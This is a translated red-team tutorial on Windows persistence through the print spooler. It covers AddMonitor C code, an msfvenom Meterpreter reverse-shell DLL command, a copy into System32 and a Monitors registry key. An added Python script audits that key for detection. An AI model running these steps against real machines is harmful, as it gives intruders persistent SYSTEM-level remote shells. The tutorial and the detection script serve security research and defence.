The spooler service manages print jobs in the Windows operating system. Interaction with the service takes place through the print spooler API, which contains a function (AddMonitor) that can be used to install a local port monitor and connects the configuration, data and monitor files. This function can load a DLL into the spoolsv.exe process, and a red team operator can achieve persistence on the system by creating the corresponding registry keys. Brady Bloxham demonstrated this persistence technique at DEF CON 22. It should be noted that this technique requires administrator-level privileges and that the DLL must be dropped to disk.

Mantvydas Baranauskas uses the following code on his website as part of his Red Team notes. The windows.h header includes winspool.h, which is required per the Microsoft specification. The MONITOR_INFO_2 structure is used to specify the required monitor details:
- pName // monitor name
- pEnvironment // environment architecture
- pDLLName // name of the monitor DLL file
#include <windows.h>   // pulls in winspool.h, which declares MONITOR_INFO_2 and AddMonitor (link against winspool.lib)

int main() {
    MONITOR_INFO_2 monitorInfo;
    TCHAR env[12] = TEXT("Windows x64");   // environment the monitor supports
    TCHAR name[12] = TEXT("Monitor");      // monitor name as it appears under the Monitors key
    TCHAR dll[12] = TEXT("test.dll");      // monitor DLL, expected to reside in System32
    monitorInfo.pName = name;
    monitorInfo.pEnvironment = env;
    monitorInfo.pDLLName = dll;
    // Level 2 tells the spooler that the buffer holds a MONITOR_INFO_2 structure;
    // NULL as the server name installs the monitor on the local machine
    AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
    return 0;
}
AddMonitor function
Compiling the code generates an executable (in this case, application.exe) that registers the malicious DLL (test.dll) on the system. The Metasploit framework can be used to generate a DLL that will serve the Meterpreter payload.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.02.21. LPORT=4444 -f dll > test.dll
The DLL must be copied to the System32 folder because, according to the Microsoft documentation, this is the location from which AddMonitor loads the associated DLL.
copy C:\Users\pentestlab\Desktop\test.dll C:\Windows\System32
Monitors.exe
Copy the malicious DLL to System32
Monitors.exe must be in the same folder (System32) as the malicious DLL. Executing this file establishes communication with Meterpreter.
Meterpreter – AddMonitor registers DLLS
However, for persistence, a key is required under the Monitors registry location.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
The following command creates a registry key (Pentestlab) under that location whose Driver value contains test.dll. Viewing the registry in the editor verifies that the key has been created.
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ
Port Monitor – Registry key
On the next reboot, the spoolsv.exe process loads every driver DLL listed under the Monitors registry key that is stored in the Windows System32 folder. The following figure shows that the Meterpreter session has been established with the same privilege level as the Print Spooler service (SYSTEM) and was executed from the System32 folder (the folder where test.dll was dropped).
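Because the persistence lives entirely in the Monitors registry key and a DLL name that spoolsv.exe resolves from System32, a defender can detect it by diffing that key against a known-good baseline. The following Python script is an added example (not code from the original post, from Pentestlab or from Mantvydas Baranauskas): it parses the text that `reg export "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors" monitors.reg` produces and reports every monitor whose Driver value is missing, contains a path, is not in the allowlist, or differs from the allowlisted DLL. The BASELINE allowlist and the SAMPLE_EXPORT text are assumptions constructed for the example; build the real baseline from a clean reference host of the same Windows build.

```python
import re
import sys
from typing import Dict, List, Optional, Tuple

MONITORS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors"

# Assumed allowlist of port monitors shipped with Windows (monitor name -> Driver DLL).
# Illustrative only: generate the real one from a clean reference host.
BASELINE: Dict[str, str] = {
    "Local Port": "localspl.dll",
    "Standard TCP/IP Port": "tcpmon.dll",
    "USB Monitor": "usbmon.dll",
    "WSD Port": "WSDMon.dll",
}

# Constructed sample of a `reg export` of the Monitors key; the last key mirrors
# the reg add command shown in the article.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port]
"Driver"="localspl.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port]
"Driver"="tcpmon.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Standard TCP/IP Port\Ports]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Pentestlab]
"Driver"="test.dll"
"""


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {monitor name: {value name: data}} for the direct subkeys of Monitors.

    Only REG_SZ values ("Name"="data") are captured, which is all the Driver check needs.
    """
    monitors: Dict[str, Dict[str, str]] = {}
    prefix = MONITORS_KEY.lower() + "\\"
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            rest = path[len(prefix):]
            # A monitor is a direct child of Monitors; deeper keys (e.g. ...\Ports) are skipped.
            if path.lower().startswith(prefix) and rest and "\\" not in rest:
                current = rest
                monitors[current] = {}
            else:
                current = None
            continue
        match = re.match(r'^"([^"]+)"="(.*)"$', line)
        if current is not None and match:
            # reg export doubles backslashes inside string data
            monitors[current][match.group(1)] = match.group(2).replace("\\\\", "\\")
    return monitors


def audit_monitors(monitors: Dict[str, Dict[str, str]]) -> List[Tuple[str, Optional[str], str]]:
    """Return (monitor name, Driver data, reason) for every entry that deviates from BASELINE."""
    findings: List[Tuple[str, Optional[str], str]] = []
    for name, values in monitors.items():
        driver = values.get("Driver")
        if driver is None:
            findings.append((name, None, "no Driver value"))
        elif "\\" in driver or "/" in driver:
            # The spooler loads a bare file name from System32; a path is not how Windows registers one.
            findings.append((name, driver, "Driver contains a path"))
        elif name not in BASELINE:
            findings.append((name, driver, "monitor not in baseline"))
        elif driver.lower() != BASELINE[name].lower():
            findings.append((name, driver, f"Driver differs from baseline {BASELINE[name]}"))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # reg export writes UTF-16 with a byte-order mark; the utf-16 codec consumes it
        with open(sys.argv[1], encoding="utf-16") as handle:
            export_text = handle.read()
    else:
        export_text = SAMPLE_EXPORT
    for monitor, dll, reason in audit_monitors(parse_reg_export(export_text)):
        print(f"[!] {monitor}: Driver={dll} ({reason})")
```

Run it without arguments to audit the constructed sample, or pass the path of a real export; on the sample it reports only the Pentestlab key. A finding is worth correlating with the Spooler's image loads (the unexpected DLL is loaded by spoolsv.exe from System32 at the next service start) and with the write to the Monitors key, which an EDR or Sysmon registry-event rule on that path catches at the moment the reg add runs.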
Persistent port Monitor – Meterpreter
This article is compiled and translated by Bypass for security research and learning purposes only.
Original address: pentestlab.blog/2019/10/28/…